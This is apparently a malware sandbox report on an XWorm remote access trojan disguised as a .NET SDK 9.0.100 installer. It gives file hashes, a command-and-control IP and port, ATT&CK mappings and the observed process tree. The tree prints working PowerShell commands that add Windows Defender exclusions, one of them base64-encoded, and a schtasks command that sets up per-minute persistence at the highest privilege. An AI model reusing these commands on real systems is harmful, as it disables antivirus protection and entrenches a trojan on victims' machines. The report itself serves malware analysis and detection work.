xworm | 14e1543b36090ee77218206f2e1e39e320271f103978cdb00cab1299d192a118

Analysis

max time kernel
18s
max time network
30s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
26-11-2024 00:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dotnet-sdk-9.0.100-win-64 (1).exe
Size

212.9MB
MD5

1ae771c20005b76b9296feca0926cc81
SHA1

a789708d3222e0e6e9b1705003b13e0404a6139c
SHA256

14e1543b36090ee77218206f2e1e39e320271f103978cdb00cab1299d192a118
SHA512

534e1629204bd81f61c184e99c5d45756b4b7c1606b76ea1f5ff73b920fc5aa0e919e09dd61b96ee6063d650d7c9bc0caf9f27183633c1980c0372f7550a55b2
SSDEEP

6291456:E4IJevymSdk7X1mLLoAwI7qpB6WDOWhOYj+aeI3dUjnD5:8ENwLLo87SBQWhO6eItyD

Score

10^/10

xworm defense_evasion discovery execution persistence rat trojan

Malware Config

Extracted

Family

xworm

45.88.91.138:4200

Attributes

Install_directory
%AppData%
install_file
USB.exe

Signatures

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\asdaasdadasasdadsa.exe	family_xworm
behavioral1/memory/3064-102-0x00000000009E0000-0x00000000009FC000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

4176 powershell.exe
2112 powershell.exe
5116 powershell.exe
1600 powershell.exe

pid	process
4176	powershell.exe
2112	powershell.exe
5116	powershell.exe
1600	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Output.exeasdaasdadasasdadsa.exedotnet-sdk-9.0.100-win-64 (1).exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	Output.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	asdaasdadasasdadsa.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	dotnet-sdk-9.0.100-win-64 (1).exe

Drops startup file 2 IoCs

Processes:

asdaasdadasasdadsa.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktop Window Host.lnk	asdaasdadasasdadsa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktop Window Host.lnk	asdaasdadasasdadsa.exe

Executes dropped EXE 4 IoCs

Processes:

dotnet-sdk-9.0.100-win-64.exeOutput.exedotnet-sdk-9.0.100-win-64.exeasdaasdadasasdadsa.exe

pid process

4264 dotnet-sdk-9.0.100-win-64.exe
1984 Output.exe
4780 dotnet-sdk-9.0.100-win-64.exe
3064 asdaasdadasasdadsa.exe
Loads dropped DLL 1 IoCs

Processes:

dotnet-sdk-9.0.100-win-64.exe

pid process

4780 dotnet-sdk-9.0.100-win-64.exe

pid	process
4264	dotnet-sdk-9.0.100-win-64.exe
1984	Output.exe
4780	dotnet-sdk-9.0.100-win-64.exe
3064	asdaasdadasasdadsa.exe

pid	process
4780	dotnet-sdk-9.0.100-win-64.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

asdaasdadasasdadsa.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Desktop Window Host = "C:\\Users\\Admin\\AppData\\Roaming\\Desktop Window Host"	asdaasdadasasdadsa.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

17 ip-api.com
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
17	ip-api.com

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.exedotnet-sdk-9.0.100-win-64.exedotnet-sdk-9.0.100-win-64.exedotnet-sdk-9.0.100-win-64 (1).exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dotnet-sdk-9.0.100-win-64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dotnet-sdk-9.0.100-win-64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dotnet-sdk-9.0.100-win-64 (1).exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

2136 schtasks.exe

pid	process
2136	schtasks.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeasdaasdadasasdadsa.exe

pid	process
1588	powershell.exe
1588	powershell.exe
1600	powershell.exe
1600	powershell.exe
4176	powershell.exe
4176	powershell.exe
2112	powershell.exe
2112	powershell.exe
5116	powershell.exe
5116	powershell.exe
3064	asdaasdadasasdadsa.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeasdaasdadasasdadsa.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeDebugPrivilege	3064	asdaasdadasasdadsa.exe
Token: SeIncreaseQuotaPrivilege	1588	powershell.exe
Token: SeSecurityPrivilege	1588	powershell.exe
Token: SeTakeOwnershipPrivilege	1588	powershell.exe
Token: SeLoadDriverPrivilege	1588	powershell.exe
Token: SeSystemProfilePrivilege	1588	powershell.exe
Token: SeSystemtimePrivilege	1588	powershell.exe
Token: SeProfSingleProcessPrivilege	1588	powershell.exe
Token: SeIncBasePriorityPrivilege	1588	powershell.exe
Token: SeCreatePagefilePrivilege	1588	powershell.exe
Token: SeBackupPrivilege	1588	powershell.exe
Token: SeRestorePrivilege	1588	powershell.exe
Token: SeShutdownPrivilege	1588	powershell.exe
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeSystemEnvironmentPrivilege	1588	powershell.exe
Token: SeRemoteShutdownPrivilege	1588	powershell.exe
Token: SeUndockPrivilege	1588	powershell.exe
Token: SeManageVolumePrivilege	1588	powershell.exe
Token: 33	1588	powershell.exe
Token: 34	1588	powershell.exe
Token: 35	1588	powershell.exe
Token: 36	1588	powershell.exe
Token: SeDebugPrivilege	1600	powershell.exe
Token: SeIncreaseQuotaPrivilege	1600	powershell.exe
Token: SeSecurityPrivilege	1600	powershell.exe
Token: SeTakeOwnershipPrivilege	1600	powershell.exe
Token: SeLoadDriverPrivilege	1600	powershell.exe
Token: SeSystemProfilePrivilege	1600	powershell.exe
Token: SeSystemtimePrivilege	1600	powershell.exe
Token: SeProfSingleProcessPrivilege	1600	powershell.exe
Token: SeIncBasePriorityPrivilege	1600	powershell.exe
Token: SeCreatePagefilePrivilege	1600	powershell.exe
Token: SeBackupPrivilege	1600	powershell.exe
Token: SeRestorePrivilege	1600	powershell.exe
Token: SeShutdownPrivilege	1600	powershell.exe
Token: SeDebugPrivilege	1600	powershell.exe
Token: SeSystemEnvironmentPrivilege	1600	powershell.exe
Token: SeRemoteShutdownPrivilege	1600	powershell.exe
Token: SeUndockPrivilege	1600	powershell.exe
Token: SeManageVolumePrivilege	1600	powershell.exe
Token: 33	1600	powershell.exe
Token: 34	1600	powershell.exe
Token: 35	1600	powershell.exe
Token: 36	1600	powershell.exe
Token: SeDebugPrivilege	4176	powershell.exe
Token: SeIncreaseQuotaPrivilege	4176	powershell.exe
Token: SeSecurityPrivilege	4176	powershell.exe
Token: SeTakeOwnershipPrivilege	4176	powershell.exe
Token: SeLoadDriverPrivilege	4176	powershell.exe
Token: SeSystemProfilePrivilege	4176	powershell.exe
Token: SeSystemtimePrivilege	4176	powershell.exe
Token: SeProfSingleProcessPrivilege	4176	powershell.exe
Token: SeIncBasePriorityPrivilege	4176	powershell.exe
Token: SeCreatePagefilePrivilege	4176	powershell.exe
Token: SeBackupPrivilege	4176	powershell.exe
Token: SeRestorePrivilege	4176	powershell.exe
Token: SeShutdownPrivilege	4176	powershell.exe
Token: SeDebugPrivilege	4176	powershell.exe
Token: SeSystemEnvironmentPrivilege	4176	powershell.exe
Token: SeRemoteShutdownPrivilege	4176	powershell.exe
Token: SeUndockPrivilege	4176	powershell.exe
Token: SeManageVolumePrivilege	4176	powershell.exe
Token: 33	4176	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

asdaasdadasasdadsa.exe

pid process

3064 asdaasdadasasdadsa.exe

pid	process
3064	asdaasdadasasdadsa.exe

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

dotnet-sdk-9.0.100-win-64 (1).exedotnet-sdk-9.0.100-win-64.exeOutput.exeasdaasdadasasdadsa.exe

description	pid	process	target process
PID 1684 wrote to memory of 1588	1684	dotnet-sdk-9.0.100-win-64 (1).exe	powershell.exe
PID 1684 wrote to memory of 1588	1684	dotnet-sdk-9.0.100-win-64 (1).exe	powershell.exe
PID 1684 wrote to memory of 1588	1684	dotnet-sdk-9.0.100-win-64 (1).exe	powershell.exe
PID 1684 wrote to memory of 4264	1684	dotnet-sdk-9.0.100-win-64 (1).exe	dotnet-sdk-9.0.100-win-64.exe
PID 1684 wrote to memory of 4264	1684	dotnet-sdk-9.0.100-win-64 (1).exe	dotnet-sdk-9.0.100-win-64.exe
PID 1684 wrote to memory of 4264	1684	dotnet-sdk-9.0.100-win-64 (1).exe	dotnet-sdk-9.0.100-win-64.exe
PID 1684 wrote to memory of 1984	1684	dotnet-sdk-9.0.100-win-64 (1).exe	Output.exe
PID 1684 wrote to memory of 1984	1684	dotnet-sdk-9.0.100-win-64 (1).exe	Output.exe
PID 4264 wrote to memory of 4780	4264	dotnet-sdk-9.0.100-win-64.exe	dotnet-sdk-9.0.100-win-64.exe
PID 4264 wrote to memory of 4780	4264	dotnet-sdk-9.0.100-win-64.exe	dotnet-sdk-9.0.100-win-64.exe
PID 4264 wrote to memory of 4780	4264	dotnet-sdk-9.0.100-win-64.exe	dotnet-sdk-9.0.100-win-64.exe
PID 1984 wrote to memory of 3064	1984	Output.exe	asdaasdadasasdadsa.exe
PID 1984 wrote to memory of 3064	1984	Output.exe	asdaasdadasasdadsa.exe
PID 3064 wrote to memory of 1600	3064	asdaasdadasasdadsa.exe	powershell.exe
PID 3064 wrote to memory of 1600	3064	asdaasdadasasdadsa.exe	powershell.exe
PID 3064 wrote to memory of 4176	3064	asdaasdadasasdadsa.exe	powershell.exe
PID 3064 wrote to memory of 4176	3064	asdaasdadasasdadsa.exe	powershell.exe
PID 3064 wrote to memory of 2112	3064	asdaasdadasasdadsa.exe	powershell.exe
PID 3064 wrote to memory of 2112	3064	asdaasdadasasdadsa.exe	powershell.exe
PID 3064 wrote to memory of 5116	3064	asdaasdadasasdadsa.exe	powershell.exe
PID 3064 wrote to memory of 5116	3064	asdaasdadasasdadsa.exe	powershell.exe
PID 3064 wrote to memory of 2136	3064	asdaasdadasasdadsa.exe	schtasks.exe
PID 3064 wrote to memory of 2136	3064	asdaasdadasasdadsa.exe	schtasks.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\dotnet-sdk-9.0.100-win-64 (1).exe
"C:\Users\Admin\AppData\Local\Temp\dotnet-sdk-9.0.100-win-64 (1).exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1684
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AdQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcABpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAbQBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZAB6ACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1588
- C:\Users\Admin\AppData\Local\Temp\dotnet-sdk-9.0.100-win-64.exe
  "C:\Users\Admin\AppData\Local\Temp\dotnet-sdk-9.0.100-win-64.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4264
- - C:\Windows\Temp\{23E4E475-4030-428C-9453-4AB57E034DFE}\.cr\dotnet-sdk-9.0.100-win-64.exe
    "C:\Windows\Temp\{23E4E475-4030-428C-9453-4AB57E034DFE}\.cr\dotnet-sdk-9.0.100-win-64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\dotnet-sdk-9.0.100-win-64.exe" -burn.filehandle.attached=688 -burn.filehandle.self=692
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:4780
- C:\Users\Admin\AppData\Local\Temp\Output.exe
  "C:\Users\Admin\AppData\Local\Temp\Output.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1984
- - C:\Users\Admin\AppData\Roaming\asdaasdadasasdadsa.exe
    "C:\Users\Admin\AppData\Roaming\asdaasdadasasdadsa.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\asdaasdadasasdadsa.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1600
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'asdaasdadasasdadsa.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4176
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Desktop Window Host'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2112
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Desktop Window Host'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5116
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Desktop Window Host" /tr "C:\Users\Admin\AppData\Roaming\Desktop Window Host"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2136

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
21KB

MD5
e763d07532c5a9477ba078f9d5b48923

SHA1
2551937a53094ff9da1c1d3afc691fb516972452

SHA256
b0cc48ef48c94a33ceeeb558da9de3d3685fd50cd2a349d48ffdf7deb698610f

SHA512
f1514880950c7df966b43936e33466f1042ee67adf843ac9b8645679188a162b6462bbdd67539a0026d1fb8dc638b3336e5eadd329e333f3162192d719013d7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
730d375c503ac7775813330efd853380

SHA1
300c1b9ab4fb1434c3d8707309794bdd972717d2

SHA256
bc155a091781a76ef6811cf536a50729729fcf645f4232107072178ad186c5ab

SHA512
ce04a25ef018692dbc125433d00416badf2a9084d536dd83f8040bfcbac96f7f947ae5d13f147337aa96164553f050a9398ee369a7681f24cadc6b194e8a4f49

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ac6bb71eeca525e6539676954b863622

SHA1
78a1f5f8642c3a43952c96170f81f5f51bf05db7

SHA256
627033be9f98b25d2b5f44e6aefe85b504ead01ed6629643145a9de2f368d4b6

SHA512
3a12977f5838987f3afedd653843b0d39bba48d44110114ba8fd75a35ff37c25c0db0af7c185b571d65cc5fc82a3e43ef9d3e3a3a5628f0fa29ada26aad99c0f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9a8b2a6d2677f6cfa7d2ad03a94d65f8

SHA1
f42f7592b90e8d2af533e9357e1c9471a8c41829

SHA256
ad169328cd77166a975ddb9195ebd450efaaf48e0e8bf7053637d4390391d06c

SHA512
85f659f4530a4134947e03e17b10ae20f0b5823cee6617fea876e5f120d8704fc1ee975910f1eb5c082a4ff238cffd2f48a43f131f39b4fbd932d8ce48836bc5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Output.exe

Filesize
98KB

MD5
ca1ee054e56b2af28071af58453d48ff

SHA1
e202d06d147cad99f63744983a136a159f9f1649

SHA256
0b78080830c60bb352ceb9c388c2ee39c0bdb5ed9ad18332893d4016c5f22f22

SHA512
9c495978933de604789fa720f5feea7e28cb10a40bfb7234e66b3593d7477725983dffba967f5123c413ea87930afe947c69112dfd056d9b7cb9330e03a4a211

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ww2rkmnu.0x2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\asdaasdadasasdadsa.exe

Filesize
88KB

MD5
c14918969a559223861a5b1a1adeb862

SHA1
293f32ddb0a3367ef2a9ace69770009d8b3e2c6c

SHA256
3063984d5dcb46a1efc92838330520f653f3e989d00f0d969cf6d98c427ebbcc

SHA512
b0d7b26004e70962ee5dc9d76863cc2cbdd15b56ac83e2ffe20229b61ca11ee7ef0cd4c864dab2d6a9a71c37c92ce8b3a0ccf1c6056df68553af1d55cc86b85a

Download Submit
C:\Windows\Temp\{23E4E475-4030-428C-9453-4AB57E034DFE}\.cr\dotnet-sdk-9.0.100-win-64.exe

Filesize
612KB

MD5
71447e01f1ad409ce666e31ed486a48b

SHA1
494bc1132c18b0fccbc43f88fcf3fce193672fbd

SHA256
8ca15b35a3ddec5cd03abe0f101d5e0d8d5dc3c14f869d121463221728ca3e20

SHA512
ddac85a9e05f28a7e0f7ee086336bae5c96854c9a9ccdb4bcd940f3be3692b1435f4e6089e1fdba29672f983bf7a250cb531c39625691dbbf708190be68d741c

Download Submit
C:\Windows\Temp\{2720982F-EBF7-4DF2-8DBF-D5693C9BBBFA}\.ba\bg.png

Filesize
4KB

MD5
9eb0320dfbf2bd541e6a55c01ddc9f20

SHA1
eb282a66d29594346531b1ff886d455e1dcd6d99

SHA256
9095bf7b6baa0107b40a4a6d727215be077133a190f4ca9bd89a176842141e79

SHA512
9ada3a1757a493fbb004bd767fab8f77430af69d71479f340b8b8ede904cc94cd733700db593a4a2d2e1184c0081fd0648318d867128e1cb461021314990931d

Download Submit
C:\Windows\Temp\{2720982F-EBF7-4DF2-8DBF-D5693C9BBBFA}\.ba\wixstdba.dll

Filesize
190KB

MD5
f1919c6bd85d7a78a70c228a5b227fbe

SHA1
71647ebf4e7bed3bc1663d520419ac550fe630ff

SHA256
dcea15f3710822ffc262e62ec04cc7bbbf0f33f5d1a853609fbfb65cb6a45640

SHA512
c7ff9b19c9bf320454a240c6abbc382950176a6befce05ea73150eeb0085d0b6ed5b65b2dcb4b04621ef9cca1d5c4e59c6682b9c85d1d5845e5ce3e5eedfd2eb

Download Submit
memory/1588-42-0x0000000006F60000-0x0000000006F7A000-memory.dmp

Filesize
104KB

Download
memory/1588-76-0x00000000071E0000-0x0000000007276000-memory.dmp

Filesize
600KB

Download
memory/1588-41-0x00000000075B0000-0x0000000007C2A000-memory.dmp

Filesize
6.5MB

Download
memory/1588-0-0x0000000002580000-0x00000000025B6000-memory.dmp

Filesize
216KB

Download
memory/1588-40-0x0000000006E30000-0x0000000006ED3000-memory.dmp

Filesize
652KB

Download
memory/1588-56-0x0000000006FD0000-0x0000000006FDA000-memory.dmp

Filesize
40KB

Download
memory/1588-1-0x0000000004E20000-0x00000000054EA000-memory.dmp

Filesize
6.8MB

Download
memory/1588-28-0x0000000006DD0000-0x0000000006E02000-memory.dmp

Filesize
200KB

Download
memory/1588-29-0x000000006FCF0000-0x000000006FD3C000-memory.dmp

Filesize
304KB

Download
memory/1588-39-0x0000000006E10000-0x0000000006E2E000-memory.dmp

Filesize
120KB

Download
memory/1588-2-0x0000000004DB0000-0x0000000004DD2000-memory.dmp

Filesize
136KB

Download
memory/1588-16-0x0000000005CA0000-0x0000000005CEC000-memory.dmp

Filesize
304KB

Download
memory/1588-15-0x0000000005BF0000-0x0000000005C0E000-memory.dmp

Filesize
120KB

Download
memory/1588-6-0x00000000055D0000-0x0000000005636000-memory.dmp

Filesize
408KB

Download
memory/1588-14-0x0000000005740000-0x0000000005A97000-memory.dmp

Filesize
3.3MB

Download
memory/1588-3-0x0000000005560000-0x00000000055C6000-memory.dmp

Filesize
408KB

Download
memory/1600-144-0x000001CB5D410000-0x000001CB5D432000-memory.dmp

Filesize
136KB

Download
memory/1984-61-0x00000000002C0000-0x00000000002DE000-memory.dmp

Filesize
120KB

Download
memory/3064-102-0x00000000009E0000-0x00000000009FC000-memory.dmp

Filesize
112KB

Download
memory/5116-186-0x00000217676D0000-0x00000217678ED000-memory.dmp

Filesize
2.1MB

Download